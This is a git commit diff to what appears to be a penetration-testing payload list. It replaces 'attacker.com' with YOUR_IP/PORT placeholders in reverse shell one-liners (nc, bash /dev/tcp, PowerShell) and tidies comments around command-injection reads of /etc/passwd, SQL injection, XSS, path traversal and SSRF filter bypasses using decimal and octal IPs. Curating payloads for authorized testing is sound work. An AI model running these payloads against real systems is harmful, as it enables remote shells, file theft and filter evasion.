Fix code review comments: improve formatting and use placeholder values

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
2026-05-26 11:35:51 +00:00 · 2026-01-04 18:26:37 +00:00
parent ab9c127df3
commit dbf612f6b1
3 changed files with 20 additions and 18 deletions
@@ -74,7 +74,7 @@ c'a't /etc/passwd
 c"a"t /etc/passwd
 c\at /etc/passwd

-# Reverse shell payloads (for testing only)
-; nc -e /bin/sh attacker.com 4444
-| bash -i >& /dev/tcp/attacker.com/4444 0>&1
-& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);"
+# Reverse shell payloads (for authorized testing only - replace YOUR_IP and PORT)
+; nc -e /bin/sh YOUR_IP PORT
+| bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1
+& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',PORT);"
@@ -32,18 +32,19 @@ user\x00admin
 /var/log/auth.log
 ../../../var/log/syslog

-# Events that should be logged (test if they're logged)
- Failed login attempts
- Successful login
- Password changes
- Privilege escalation
- Administrative actions
- Access to sensitive data
- Invalid input
- Authentication failures
- Authorization failures
+# Events to test if they appear in logs
+# Try these payloads and verify they are logged appropriately:
+# - Failed login attempts
+# - Successful login
+# - Password changes
+# - Privilege escalation attempts
+# - Administrative actions
+# - Access to sensitive data
+# - Invalid input
+# - Authentication failures
+# - Authorization failures

-# Events to check in logs
+# Sample payloads to check logging behavior
 SELECT * FROM users WHERE username='admin' AND password='wrong'
 <script>alert('XSS')</script>
 ../../../etc/passwd
@@ -51,9 +51,10 @@ ldap://127.0.0.1:389
 tftp://127.0.0.1:69

 # Bypassing filters
-# Using decimal IP
-http://2130706433 (127.0.0.1)
-http://3232235521 (192.168.0.1)
+# Using decimal IP (127.0.0.1 in decimal)
+http://2130706433
+# Using decimal IP (192.168.0.1 in decimal)
+http://3232235521

 # Using octal IP
 http://0177.0.0.1